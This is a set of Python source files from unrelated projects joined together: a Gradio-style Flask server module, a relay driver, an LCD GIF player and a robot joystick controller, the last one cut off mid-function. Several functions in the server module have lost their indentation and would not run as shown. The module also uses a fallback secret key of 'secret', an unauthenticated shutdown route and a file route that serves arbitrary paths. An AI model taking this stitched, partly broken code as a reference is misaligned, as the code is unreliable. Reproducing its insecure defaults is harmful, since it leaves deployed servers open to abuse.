        data = b"".join(msgparts)
        # BUGFIX: np.fromstring is deprecated and removed in modern NumPy;
        # np.frombuffer is the replacement. Copy so the returned frame stays
        # writable, matching fromstring's behavior.
        pixels = np.frombuffer(data, dtype=np.uint8).copy()
        return pixels.reshape(self.height, self.width, self.channel)

    def start(self):
        """Start the background receive loop; returns self for chaining."""
        self.stopped = False
        self.thread = Thread(target=self.update, args=())
        self.thread.start()
        return self

    def update(self):
        """Receive-loop body: keep reading frames, reconnecting on failure."""
        while True:
            if self.stopped:
                return
            image = self.read_image()
            if image is False:
                self.connect()
                t.sleep(0.02)
                continue
            self.frame = image
            t.sleep(0.002)

    def read(self):
        """Return the most recent frame (False if none received yet)."""
        return self.frame

    def stop(self):
        """Signal the receive loop to exit; returns self for chaining."""
        self.stopped = True
        return self

    def is_connected(self):
        return self.connected

    def is_running(self):
        return not self.stopped

    def is_thread_alive(self):
        return self.thread.is_alive()
|
networking.py | """
Defines helper methods useful for setting up ports, launching servers, and handling `ngrok`
"""
import os
import socket
import threading
from flask import Flask, request, session, jsonify, abort, send_file, render_template, redirect
from flask_cachebuster import CacheBuster
from flask_login import LoginManager, login_user, current_user, login_required
from flask_cors import CORS
import threading
import pkg_resources
import datetime
import time
import json
import urllib.request
from shutil import copyfile
import requests
import sys
import csv
import logging
from gradio.tunneling import create_tunnel
from gradio import encryptor
from gradio import queue
from functools import wraps
import io
import inspect
import traceback
INITIAL_PORT_VALUE = int(os.getenv(
'GRADIO_SERVER_PORT', "7860")) # The http server will try to open on port 7860. If not available, 7861, 7862, etc.
TRY_NUM_PORTS = int(os.getenv(
'GRADIO_NUM_PORTS', "100")) # Number of ports to try before giving up and throwing an exception.
LOCALHOST_NAME = os.getenv(
'GRADIO_SERVER_NAME', "127.0.0.1")
GRADIO_API_SERVER = "https://api.gradio.app/v1/tunnel-request"
GRADIO_FEATURE_ANALYTICS_URL = "https://api.gradio.app/gradio-feature-analytics/"
STATIC_TEMPLATE_LIB = pkg_resources.resource_filename("gradio", "templates/")
STATIC_PATH_LIB = pkg_resources.resource_filename("gradio", "templates/frontend/static")
VERSION_FILE = pkg_resources.resource_filename("gradio", "version.txt")
with open(VERSION_FILE) as version_file:
GRADIO_STATIC_ROOT = "https://gradio.s3-us-west-2.amazonaws.com/" + \
version_file.read().strip() + "/static/"
app = Flask(__name__,
template_folder=STATIC_TEMPLATE_LIB,
static_folder="",
static_url_path="/none/")
app.url_map.strict_slashes = False
CORS(app)
cache_buster = CacheBuster(
config={'extensions': ['.js', '.css'], 'hash_size': 5})
cache_buster.init_app(app)
app.secret_key = os.getenv("GRADIO_KEY", "secret")
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
# Hide Flask default message
cli = sys.modules['flask.cli']
cli.show_server_banner = lambda *x: None
class User:
    """Minimal flask-login user object wrapping a username/id."""

    def __init__(self, id):
        # Attributes required by the flask-login user protocol; every
        # instance represents a successfully authenticated, active user.
        self.id = id
        self.is_anonymous = False
        self.is_active = True
        self.is_authenticated = True

    def get_id(self):
        """Return the identifier flask-login stores in the session."""
        return self.id
@login_manager.user_loader
def load_user(_id):
    """flask-login callback: rebuild a User from the session-stored id."""
    return User(_id)
def login_check(func):
    """Decorator: require login for *func* only when auth is configured.

    ``app.auth`` is set at server start; when it is falsy the view is
    served without any login requirement.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        if app.auth:
            # Wrap the call in flask-login's login_required at request
            # time, so the check reflects the current app.auth setting.
            @login_required
            def func2(*args, **kwargs):
                return func(*args, **kwargs)
            return func2(*args, **kwargs)
        else:
            return func(*args, **kwargs)
    return wrapper
def get_local_ip_address():
    """Return this machine's public IP via api.ipify.org (best effort)."""
    try:
        return requests.get('https://api.ipify.org', timeout=3).text
    except (requests.ConnectionError, requests.exceptions.ReadTimeout):
        # Offline or the service is unreachable; report a sentinel string.
        return "No internet connection"
IP_ADDRESS = get_local_ip_address()
def get_first_available_port(initial, final):
    """
    Gets the first open port in a specified range of port numbers
    :param initial: the initial value in the range of port numbers
    :param final: final (exclusive) value in the range of port numbers, should be greater than `initial`
    :return: the first port that could be bound
    :raises OSError: if every port in the range is in use
    """
    for port in range(initial, final):
        s = socket.socket()  # create a socket object
        try:
            s.bind((LOCALHOST_NAME, port))  # Bind to the port
            return port
        except OSError:
            pass
        finally:
            # BUGFIX: always close the probe socket; previously it leaked
            # whenever bind() raised, leaving one open fd per busy port.
            s.close()
    raise OSError(
        "All ports from {} to {} are in use. Please close a port.".format(
            initial, final
        )
    )
@app.route("/", methods=["GET"])
@login_check
def main():
session["state"] = None
return render_template("frontend/index.html", config=app.interface.config)
@app.route("/static/<path:path>", methods=["GET"])
def static_resource(path):
if app.interface.share:
return redirect(GRADIO_STATIC_ROOT + path)
else:
return send_file(os.path.join(STATIC_PATH_LIB, path))
# TODO(@aliabid94): this throws a 500 error if app.auth is None (should probalbly just redirect to '/')
@app.route('/login', methods=["GET", "POST"])
def login():
    """Render the login page (GET) or validate submitted credentials (POST)."""
    if request.method == "GET":
        config = get_config()
        return render_template("frontend/index.html", config=config)
    elif request.method == "POST":
        username = request.form.get("username")
        password = request.form.get("password")
        # app.auth is either a {username: password} dict or a callable
        # validator -- accept whichever form matches.
        if ((not callable(app.auth) and username in app.auth and app.auth[username] == password)
                or (callable(app.auth) and app.auth.__call__(username, password))):
            login_user(User(username))
            return redirect("/")
        else:
            return abort(401)
@app.route("/config/", methods=["GET"])
def get_config():
if app.interface.auth is None or current_user.is_authenticated:
return jsonify(app.interface.config)
else:
return {"auth_required": True, "auth_message": app.interface.auth_message}
@app.route("/enable_sharing/<path:path>", methods=["GET"])
@login_check
def enable_sharing(path):
if path == "None":
path = None
app.interface.config["share_url"] = path
return jsonify(success=True)
@app.route("/shutdown", methods=['GET'])
def shutdown():
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func is None:
raise RuntimeError('Not running werkzeug')
shutdown_func()
return "Shutting down..."
@app.route("/api/predict/", methods=["POST"])
@login_check
def predict():
raw_input = request.json["data"]
# Capture any errors made and pipe to front end
if app.interface.show_error:
try:
prediction, durations = app.interface.process(raw_input)
except BaseException as error:
traceback.print_exc()
return jsonify({"error": str(error)}), 500
else:
prediction, durations = app.interface.process(raw_input)
avg_durations = []
for i, duration in enumerate(durations):
app.interface.predict_durations[i][0] += duration
app.interface.predict_durations[i][1] += 1
avg_durations.append(app.interface.predict_durations[i][0]
/ app.interface.predict_durations[i][1])
app.interface.config["avg_durations"] = avg_durations
output = {"data": prediction, "durations": durations, "avg_durations": avg_durations}
if app.interface.allow_flagging == "auto":
try:
flag_index = flag_data(raw_input, prediction,
flag_option=(None if app.interface.flagging_options is None else ""),
username=current_user.id if current_user.is_authenticated else None)
output["flag_index"] = flag_index
except Exception as e:
print(str(e))
pass
return jsonify(output)
def get_types(cls_set, component):
    """Extract type names and descriptions from component docstrings.

    For "input" components the information is read from the second line of
    the ``preprocess`` docstring; otherwise from the last line of the
    ``postprocess`` docstring. Each line is expected to look like
    ``name (type): description``.

    Returns a (descriptions, type_names) pair of parallel lists.
    """
    docset = []
    types = []
    for cls in cls_set:
        if component == "input":
            doc = inspect.getdoc(cls.preprocess)
            relevant = doc.split("\n")[1]
        else:
            doc = inspect.getdoc(cls.postprocess)
            relevant = doc.split("\n")[-1]
        docset.append(relevant.split(":")[-1])
        types.append(relevant.split(")")[0].split("(")[-1])
    return docset, types
@app.route("/api/", methods=["GET"])
def api_docs():
inputs = [type(inp) for inp in app.interface.input_components]
outputs = [type(out) for out in app.interface.output_components]
input_types_doc, input_types = get_types(inputs, "input")
output_types_doc, output_types = get_types(outputs, "output")
input_names = [type(inp).__name__ for inp in app.interface.input_components]
output_names = [type(out).__name__ for out in app.interface.output_components]
sample_inputs = [inp.generate_sample() for inp in app.interface.input_components]
docs = {
"inputs": input_names,
"outputs": output_names,
"len_inputs": len(inputs),
"len_outputs": len(outputs),
"inputs_lower": [name.lower() for name in input_names],
"outputs_lower": [name.lower() for name in output_names],
"input_types": input_types,
"output_types": output_types,
"input_types_doc": input_types_doc,
"output_types_doc": output_types_doc,
"sample_inputs": sample_inputs
}
return render_template("api_docs.html", **docs)
def log_feature_analytics(feature):
    """Best-effort ping of the gradio analytics endpoint for *feature* usage."""
    if app.interface.analytics_enabled:
        try:
            requests.post(GRADIO_FEATURE_ANALYTICS_URL,
                          data={
                              'ip_address': IP_ADDRESS,
                              'feature': feature}, timeout=3)
        except (requests.ConnectionError, requests.exceptions.ReadTimeout):
            pass  # do not push analytics if no network
def flag_data(input_data, output_data, flag_option=None, flag_index=None, username=None, flag_path=None):
    """Append (or update) a flagged example in the interface's CSV flag log.

    When flag_index is None a new row is appended; otherwise the "flag"
    column of the existing row at that index is rewritten to flag_option.
    Handles both plaintext and encrypted logs. Returns the number of data
    rows now in the log.
    """
    if flag_path is None:
        flag_path = os.path.join(app.cwd, app.interface.flagging_dir)
    log_fp = "{}/log.csv".format(flag_path)
    encryption_key = app.interface.encryption_key if app.interface.encrypt else None
    is_new = not os.path.exists(log_fp)
    if flag_index is None:
        # Build a full CSV row: serialized inputs, outputs, then optional
        # flag option / username, then a timestamp.
        csv_data = []
        for i, interface in enumerate(app.interface.input_components):
            csv_data.append(interface.save_flagged(
                flag_path, app.interface.config["input_components"][i]["label"], input_data[i], encryption_key))
        for i, interface in enumerate(app.interface.output_components):
            csv_data.append(interface.save_flagged(
                flag_path, app.interface.config["output_components"][i]["label"], output_data[i], encryption_key) if output_data[i] is not None else "")
        if flag_option is not None:
            csv_data.append(flag_option)
        if username is not None:
            csv_data.append(username)
        csv_data.append(str(datetime.datetime.now()))
        if is_new:
            # First write: compose the header row from component labels.
            headers = [interface["label"]
                       for interface in app.interface.config["input_components"]]
            headers += [interface["label"]
                        for interface in app.interface.config["output_components"]]
            if app.interface.flagging_options is not None:
                headers.append("flag")
            if username is not None:
                headers.append("username")
            headers.append("timestamp")

    def replace_flag_at_index(file_content):
        # Rewrite the "flag" cell of row flag_index in the CSV text.
        file_content = io.StringIO(file_content)
        content = list(csv.reader(file_content))
        header = content[0]
        flag_col_index = header.index("flag")
        content[flag_index][flag_col_index] = flag_option
        output = io.StringIO()
        writer = csv.writer(output)
        writer.writerows(content)
        return output.getvalue()

    if app.interface.encrypt:
        # Decrypt the whole log, apply the change in memory, re-encrypt.
        output = io.StringIO()
        if not is_new:
            with open(log_fp, "rb") as csvfile:
                encrypted_csv = csvfile.read()
            decrypted_csv = encryptor.decrypt(
                app.interface.encryption_key, encrypted_csv)
            file_content = decrypted_csv.decode()
            if flag_index is not None:
                file_content = replace_flag_at_index(file_content)
            output.write(file_content)
        writer = csv.writer(output)
        if flag_index is None:
            if is_new:
                writer.writerow(headers)
            writer.writerow(csv_data)
        with open(log_fp, "wb") as csvfile:
            csvfile.write(encryptor.encrypt(
                app.interface.encryption_key, output.getvalue().encode()))
    else:
        if flag_index is None:
            with open(log_fp, "a", newline="") as csvfile:
                writer = csv.writer(csvfile)
                if is_new:
                    writer.writerow(headers)
                writer.writerow(csv_data)
        else:
            with open(log_fp) as csvfile:
                file_content = csvfile.read()
            file_content = replace_flag_at_index(file_content)
            with open(log_fp, "w", newline="") as csvfile:  # newline parameter needed for Windows
                csvfile.write(file_content)
    with open(log_fp, "r") as csvfile:
        # Row count minus the header line.
        line_count = len([None for row in csv.reader(csvfile)]) - 1
    return line_count
@app.route("/api/flag/", methods=["POST"])
@login_check
def flag():
log_feature_analytics('flag')
data = request.json['data']
flag_data(data['input_data'], data['output_data'], data.get("flag_option"), data.get("flag_index"),
current_user.id if current_user.is_authenticated else None)
return jsonify(success=True)
@app.route("/api/interpret/", methods=["POST"])
@login_check
def interpret():
log_feature_analytics('interpret')
raw_input = request.json["data"]
interpretation_scores, alternative_outputs = app.interface.interpret(
raw_input)
return jsonify({
"interpretation_scores": interpretation_scores,
"alternative_outputs": alternative_outputs
})
@app.route("/file/<path:path>", methods=["GET"])
@login_check
def file(path):
if app.interface.encrypt and isinstance(app.interface.examples, str) and path.startswith(app.interface.examples):
with open(os.path.join(app.cwd, path), "rb") as encrypted_file:
encrypted_data = encrypted_file.read()
file_data = encryptor.decrypt(
app.interface.encryption_key, encrypted_data)
return send_file(io.BytesIO(file_data), attachment_filename=os.path.basename(path))
else:
return send_file(os.path.join(app.cwd, path))
@app.route("/api/queue/push/", methods=["POST"])
@login_check
def queue_push():
data = request.json["data"]
action = request.json["action"]
job_hash, queue_position = queue.push({"data": data}, action)
return {"hash": job_hash, "queue_position": queue_position}
@app.route("/api/queue/status/", methods=["POST"])
@login_check
def queue_status():
hash = request.json['hash']
status, data = queue.get_status(hash)
return {"status": status, "data": data}
def queue_thread(path_to_local_server, test_mode=False):
    """Worker loop: pop queued jobs and replay them against the local server.

    Runs forever (unless test_mode, which exits after one iteration).
    Job results/failures are written back through the queue module.
    """
    while True:
        try:
            next_job = queue.pop()
            if next_job is not None:
                _, hash, input_data, task_type = next_job
                queue.start_job(hash)
                # Execute the job by POSTing it to our own API endpoint.
                response = requests.post(
                    path_to_local_server + "/api/" + task_type + "/", json=input_data)
                if response.status_code == 200:
                    queue.pass_job(hash, response.json())
                else:
                    queue.fail_job(hash, response.text)
            else:
                # Queue empty; poll again shortly.
                time.sleep(1)
        except Exception as e:
            time.sleep(1)
            pass
        if test_mode:
            break
def start_server(interface, server_name, server_port=None, auth=None, ssl=None):
    """Launch the flask app for *interface* on a background daemon thread.

    :param interface: the gradio Interface being served
    :param server_name: host/interface name to bind
    :param server_port: first port to try (defaults to INITIAL_PORT_VALUE)
    :param auth: None, a list of (username, password) pairs, or a callable validator
    :param ssl: optional ssl_context passed through to flask
    :return: (port, local URL, flask app, server thread)
    """
    if server_port is None:
        server_port = INITIAL_PORT_VALUE
    port = get_first_available_port(
        server_port, server_port + TRY_NUM_PORTS
    )
    path_to_local_server = "http://{}:{}/".format(server_name, port)
    if auth is not None:
        if not callable(auth):
            # Normalize credential pairs into a lookup dict.
            app.auth = {account[0]: account[1] for account in auth}
        else:
            app.auth = auth
    else:
        app.auth = None
    app.interface = interface
    app.cwd = os.getcwd()
    # Quiet werkzeug's per-request logging.
    log = logging.getLogger('werkzeug')
    log.setLevel(logging.ERROR)
    if app.interface.enable_queue:
        if auth is not None or app.interface.encrypt:
            raise ValueError("Cannot queue with encryption or authentication enabled.")
        queue.init()
        app.queue_thread = threading.Thread(target=queue_thread, args=(path_to_local_server,))
        app.queue_thread.start()
    if interface.save_to is not None:
        interface.save_to["port"] = port
    app_kwargs = {"port": port, "host": server_name}
    if ssl:
        app_kwargs["ssl_context"] = ssl
    thread = threading.Thread(target=app.run,
                              kwargs=app_kwargs,
                              daemon=True)
    thread.start()
    return port, path_to_local_server, app, thread
def get_state():
    """Return the per-session interface state stored by set_state()."""
    return session.get("state")
def set_state(value):
    """Store per-session interface state in the flask session."""
    session["state"] = value
def close_server(process):
process.terminate()
process.join()
def url_request(url):
    """GET `url` with a JSON content-type header and a 10 s timeout.

    Returns:
        The open http.client.HTTPResponse from urlopen.

    Raises:
        RuntimeError: on any failure (wrapping the original exception).
    """
    try:
        req = urllib.request.Request(
            url=url, headers={"content-type": "application/json"}
        )
        res = urllib.request.urlopen(req, timeout=10)
        return res
    except Exception as e:
        # Chain the original exception so the real cause survives in
        # tracebacks (the original `raise RuntimeError(str(e))` dropped it).
        raise RuntimeError(str(e)) from e
def setup_tunnel(local_server_port, endpoint):
    """Request share-tunnel credentials and open the tunnel.

    Asks `endpoint` (or the default GRADIO_API_SERVER when endpoint is None)
    for a tunnel payload, then opens the tunnel to the local server port.

    Returns the value of create_tunnel on success; implicitly returns None
    when the request does not come back with HTTP 200.

    Raises:
        RuntimeError: if the 200 response cannot be parsed or the tunnel
            cannot be created.
    """
    response = url_request(
        endpoint + '/v1/tunnel-request' if endpoint is not None else GRADIO_API_SERVER)
    if response and response.code == 200:
        try:
            # Server responds with a JSON list; the first element carries the
            # tunnel payload.
            payload = json.loads(response.read().decode("utf-8"))[0]
            return create_tunnel(payload, LOCALHOST_NAME, local_server_port)
        except Exception as e:
            raise RuntimeError(str(e))
def url_ok(url):
    """Poll `url` until it responds; True if reachable within 5 attempts.

    Treats 200/401/302 as "up" (401 or 302 appear when auth is set).

    Returns:
        True once the server answers with an accepted status, False after
        five failed attempts.
    """
    for _ in range(5):
        time.sleep(.500)
        try:
            r = requests.head(url, timeout=3)
            if r.status_code in (200, 401, 302):  # 401 or 302 if auth is set
                return True
        except (ConnectionError, requests.exceptions.ConnectionError):
            # Server not accepting connections yet -- keep retrying.
            # (The original wrapped the whole loop in try/except, so the
            # first refused connection aborted all remaining retries.)
            pass
    return False
|
relay.py | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
# The class for a relay (Grove - Relay)
import threading
import time
from cisco_deviot.thing import Action, Property, PropertyType
from cisco_grovepi.sensor import Sensor
class Relay(Sensor):
    """Grove relay driver exposing turn_on/turn_off/flash DevIoT actions."""

    ON = 1
    OFF = 0

    def __init__(self, tid, name, pin):
        Sensor.__init__(self, tid, name, pin)
        # Simple on/off actions.
        self.add_action(Action("turn_on"))
        self.add_action(Action("turn_off"))
        # Parameterized flash action: total duration and per-phase interval.
        flash_action = Action("flash").\
            add_parameter(Property(name="duration", type=PropertyType.INT, value=10, range=[10, 100])).\
            add_parameter(Property(name="interval", type=PropertyType.INT, value=1, range=[1, 10]))
        self.add_action(flash_action)
        # Handle of the background flashing thread; None when idle.
        self.working_thread = None

    def turn_on(self):
        """Energize the relay."""
        Sensor.digital_write(self, Relay.ON)

    def turn_off(self):
        """De-energize the relay."""
        Sensor.digital_write(self, Relay.OFF)

    def flash(self, duration, interval):
        """Toggle the relay for `duration` units, `interval` per phase.

        Ignored while a previous flash cycle is still running.
        """
        if self.working_thread is not None:
            return
        worker = threading.Thread(target=Relay.__working_function,
                                  args=(self, duration, interval))
        self.working_thread = worker
        self.working_thread.daemon = True
        self.working_thread.start()

    def __working_function(self, duration, interval):
        # Alternate on/off until the duration budget is spent, then mark idle.
        remaining = duration
        while remaining > 0:
            self.turn_on()
            time.sleep(interval)
            remaining -= interval
            self.turn_off()
            time.sleep(interval)
            remaining -= interval
        self.working_thread = None
|
change_gif.py | # MIT License
# Copyright (c) 2014 Adafruit Industries
# Author: Tony DiCola
# Improved by yongdol503
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import time
import random
import sys
import os.path
import threading
import multiprocessing as mp
from queue import Queue #쓰레드간 통신에 사용할 큐, 프로세스간 큐는 mp에 구현되어 있음
import ST7735 as TFT
import Adafruit_GPIO as GPIO
import Adafruit_GPIO.SPI as SPI
from PIL import Image, ImageSequence
def img_prepare(lcd_size=(128, 128)):
    """Pre-render every GIF listed in the module-level `imgl`.

    Pre-processing is done up front so switching animations stays fast.

    Args:
        lcd_size: (width, height) of the target LCD. A tuple default
            replaces the original mutable list default (shared-state bug).

    Returns:
        A list of [name, frame_count, frames] entries, one per GIF.
    """
    # `imgl` is only read here, so no `global` declaration is needed.
    data = []
    for img in imgl:
        img_path = os.path.abspath(
            os.path.join(os.path.dirname(__file__), 'images', img))
        eye = Image.open(img_path)
        eye_list = []
        for frame in ImageSequence.Iterator(eye):
            # Paste each frame onto a white background so transparent GIF
            # frames render cleanly on the LCD.
            background = Image.new("RGB", lcd_size, "white")
            background.paste(frame.resize(lcd_size, resample=Image.LANCZOS), [0, 0])
            eye_list.append(background)
        data.append([img, len(eye_list), eye_list])
    return data
def recive(sup, q):  # sic: misspelled name kept -- referenced by lcd() below
    """Thread body: forward values sent by the main process into queue `q`.

    Blocks on the pipe end `sup`, pushes each received value into the local
    queue, then rendezvous on barrier2 so both LCD processes and the main
    process switch images together.
    """
    while True:
        n = sup.recv()
        q.put(n)
        print('recive')
        # barrier2 is a module-level mp.Barrier(3) shared with the main
        # process and the other eye's watcher thread.
        barrier2.wait()
def lcd(device, sup):
    """Process body that drives one LCD (one "eye").

    Pre-renders all GIFs, then plays the currently selected animation in a
    loop, switching whenever the watcher thread delivers a new index.
    """
    data = img_prepare()
    device.begin()
    q = Queue()
    # Watcher thread that relays data sent from the main process in real time.
    observer = threading.Thread(target=recive, args=(sup, q))
    observer.start()
    n = 0
    while True:
        if not q.empty():
            print('changing img!')
            n = q.get()
            print("displayed <%s>" % data[n][0])
        # Step by 2 frames to speed up GIF playback.
        for i in range(0, data[n][1], 2):
            # barrier1 keeps both eyes frame-synchronized.
            barrier1.wait()
            time.sleep(1/45)
            device.display(data[n][2][i])
        time.sleep(2)
if __name__ == "__main__":
    try:
        # Available eye animations; the index typed by the user selects one.
        imgl = ['eyes_v2_skyblue.gif', 'eyes_v2_light_brown.gif',
                'eyes_v2_brown.gif', 'eyes_v2_indigo.gif', 'eyes_v2.gif',
                'eyes_v2_love.gif', 'eyes_v2_blue.gif']
        L_eye = TFT.ST7735(rst=24, dc=25, x_offset=2, y_offset=3, rotate=180,
                           spi=SPI.SpiDev(port=0, device=0, max_speed_hz=64*1000000))
        R_eye = TFT.ST7735(rst=6, dc=12, x_offset=2, y_offset=3, rotate=180,
                           spi=SPI.SpiDev(port=0, device=1, max_speed_hz=64*1000000))
        # Pipes for sending the selected image index to each eye process.
        Lpup, Lsup = mp.Pipe()
        Rpup, Rsup = mp.Pipe()
        # barrier1: frame sync between the two eye processes.
        # barrier2: image-change sync between main and both watcher threads.
        barrier1 = mp.Barrier(2, timeout=2)
        barrier2 = mp.Barrier(3, timeout=2)
        left = mp.Process(target=lcd, args=(L_eye, Lsup))
        right = mp.Process(target=lcd, args=(R_eye, Rsup))
        left.start()
        right.start()
        # Main process: read an index from stdin and broadcast it to both eyes.
        print("change function on")
        while True:
            for n, name in enumerate(imgl):
                print(n, name)
            try:
                i = int(input())
            except (ValueError, EOFError):
                # Non-numeric input falls back to the first animation.
                # (The original bare `except:` also swallowed
                # KeyboardInterrupt here, defeating the clean Ctrl-C exit.)
                i = 0
            # Wrap around the animation list (generalized from hard-coded 7).
            Lpup.send(i % len(imgl))
            Rpup.send(i % len(imgl))
            barrier2.wait()
    except KeyboardInterrupt:
        pass
joy_multi_xbox360.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# ##
# @brief [py example simple] motion basic test for doosan robot
# @author Kab Kyoum Kim (kabkyoum.kim@doosan.com)
import rospy
import os
import threading, time
import sys
from sensor_msgs.msg import Joy
sys.dont_write_bytecode = True
sys.path.append( os.path.abspath(os.path.join(os.path.dirname(__file__),"../../../../common/imp")) ) # get import pass : DSR_ROBOT.py
from DR_tcp_client import *
# for single robot
ROBOT_ID = "dsr01"
ROBOT_MODEL = "m1013"
import DR_init
# DR_init must see the robot id/model BEFORE DSR_ROBOT is imported.
DR_init.__dsr__id = ROBOT_ID
DR_init.__dsr__model = ROBOT_MODEL
from DSR_ROBOT import *
# Robot handle shared by every callback in this script.
r = CDsrRobot(ROBOT_ID, ROBOT_MODEL)
m_stop_watch_time = 30 #sec
# Joystick state flags shared between callbacks (see joy_cb).
m_joyAnalogFlag = False
m_xyCompareFlag = False
m_joyButtonFlag = False
m_joyJogFlag = 0
m_joyJogVel = 0.0
# TCP link to the external stop-watch server; opened at import time, so the
# script fails fast when the server is unreachable.
g_sock = client_socket_open("192.168.137.2", 10004)
print("stop_watch server connect O.K!")
def shutdown():
print "shutdown time!"
print "shutdown time!"
print "shutdown time!"
pub_stop.publish(stop_mode=STOP_TYPE_QUICK)
return 0
def msgRobotState_cb(msg):
    """Robot-state subscriber callback; dumps a snapshot every 100th call."""
    msgRobotState_cb.count += 1
    # Throttle output: the state topic is high-frequency.
    if msgRobotState_cb.count % 100 == 0:
        rospy.loginfo("________ ROBOT STATUS ________")
        print(" robot_state : %d" % (msg.robot_state))
        print(" robot_state_str : %s" % (msg.robot_state_str))
        print(" current_posj : %7.3f %7.3f %7.3f %7.3f %7.3f %7.3f" % (msg.current_posj[0],msg.current_posj[1],msg.current_posj[2],msg.current_posj[3],msg.current_posj[4],msg.current_posj[5]))
# Call counter lives on the function object itself.
msgRobotState_cb.count = 0
def thread_subscriber():
    """Background thread: subscribe to the robot state topic and spin."""
    rospy.Subscriber('/'+ROBOT_ID +ROBOT_MODEL+'/state', RobotState, msgRobotState_cb)
    # spin() blocks this thread for the life of the node.
    rospy.spin()
    #rospy.spinner(2)
def thread_stop_watch():
    """Background thread: block on the stop-watch TCP server and report events."""
    print("thread_stop_watch running...")
    while 1:
        # Block until the stop-watch server sends something.
        res, rx_data = client_socket_read(g_sock)
        print("XXXXXXXXXXXXXXXXXXXXX")
        print("XXXXXXXXXXXXXXXXXXXXX")
        print("XXXXXXXXXXXXXXXXXXXXX")
        print("res={0}, rx_data ={1}".format(res, rx_data))
        # NOTE(review): under Python 3, str(...).encode() yields bytes and
        # the string comparisons below would never match; this file appears
        # written for Python 2 (print statements elsewhere) -- confirm.
        rev_str = str(rx_data).encode("utf-8")
        if rev_str == "#TIMEOUT":
            print("Time of game is over!!!!")
        elif rev_str == "#STOP":
            print("The game is stopped!!!!")
        else:
            print("unknown data!!!")
def joy_cb(msg):
    """Xbox360 /joy callback: maps buttons/axes to robot motions.

    Buttons 6+7 together: move to the ready pose and start the stop-watch.
    Button 8: stop the stop-watch and return to the home pose.
    D-pad (axes 6/7): fixed-speed X/Y jog.  Analog sticks (axes 0/1/4):
    proportional X/Y/Z jog via jog_multi.
    """
    global m_joyAnalogFlag
    global m_xyCompareFlag
    global m_joyButtonFlag
    global m_joyJogFlag
    global m_joyJogVel
    m_joyJogVel = 60
    targetPos = [0, 0, 90, 0, 90, 0]   # "ready" joint pose
    hommingPos = [0, 0, 0, 0, 0, 0]    # home joint pose (sic: "homming")
    jog_target = [0, 0, 0, 0, 0, 0]    # per-axis jog direction/scale
    # Debug dump of the first eight axes.
    for i in range(0,8):
        #print("msg.buttons[{}] = {}".format(i,msg.buttons[i]) )
        print("msg.axes[{}] = {}".format(i,msg.axes[i]) )
    print("\n")
    ####
    # go home
    if msg.buttons[7] == 1 and msg.buttons[6] == 1:
        r.movej(targetPos, 50, 50)
        #----- START stop_watch ---------------------------------
        client_socket_write(g_sock, b'#START')
        #--------------------------------------------------------
    elif msg.buttons[8] == 1:
        #----- STOP stop_watch ----------------------------------
        client_socket_write(g_sock, b'#STOP')
        #--------------------------------------------------------
        r.movej(hommingPos, 50, 50)
    # Any analog deflection on axes 0/1/4?
    if msg.axes[4] != 0 or msg.axes[0] != 0 or msg.axes[1] != 0:
        m_joyAnalogFlag = True
    else:
        m_joyAnalogFlag = False
    # NOTE(review): `msg.axes[0] or 0` relies on float truthiness and the
    # trailing `or 0` is dead; presumably `msg.axes[0] != 0` was intended
    # (runtime behavior is the same either way).
    if msg.axes[1] != 0 or msg.axes[0] or 0:
        if abs(msg.axes[1]) > abs(msg.axes[0]):
            m_xyCompareFlag = False
        else:
            m_xyCompareFlag = True
    # D-pad pressed?
    if msg.axes[6] != 0 or msg.axes[7] != 0:
        m_joyButtonFlag = True
    else:
        m_joyButtonFlag = False
    if m_joyJogFlag == -1 and not m_joyAnalogFlag and m_joyButtonFlag:
        print("1111111")
        # D-pad: pick the task axis and sign for a fixed-speed jog.
        if msg.axes[6] == 1:
            m_joyJogFlag = JOG_AXIS_TASK_Y
            m_joyJogVel = -60
        if msg.axes[6] == -1:
            m_joyJogFlag = JOG_AXIS_TASK_Y
            m_joyJogVel = 60
        if msg.axes[7] == 1:
            m_joyJogFlag = JOG_AXIS_TASK_X
            m_joyJogVel = 60
        if msg.axes[7] == -1:
            m_joyJogFlag = JOG_AXIS_TASK_X
            m_joyJogVel = -60
        #r.jog(m_joyJogFlag, MOVE_REFERENCE_TOOL, m_joyJogVel)
        r.jog_multi([1,1,0,0,0,0], MOVE_REFERENCE_BASE, m_joyJogVel)
    #elif m_joyAnalogFlag and m_joyJogFlag == -1 and not m_joyButtonFlag:
    elif m_joyAnalogFlag and not m_joyButtonFlag:
        print("22222222")
        # Right stick vertical (axis 4) -> Z direction.
        if msg.axes[4] > 0:
            #m_joyJogFlag = JOG_AXIS_TASK_Z
            jog_target[2] = 1
        if msg.axes[4] < 0:
            #m_joyJogFlag = JOG_AXIS_TASK_Z
            jog_target[2] = -1
        # NOTE(review): the unconditional flag writes below make the
        # m_xyCompareFlag guards always-true, so X and Y jog can combine;
        # the earlier abs() comparison appears vestigial -- confirm intent.
        m_xyCompareFlag = 0
        if msg.axes[1] > 0 and m_xyCompareFlag == 0:
            #m_joyJogFlag = JOG_AXIS_TASK_X
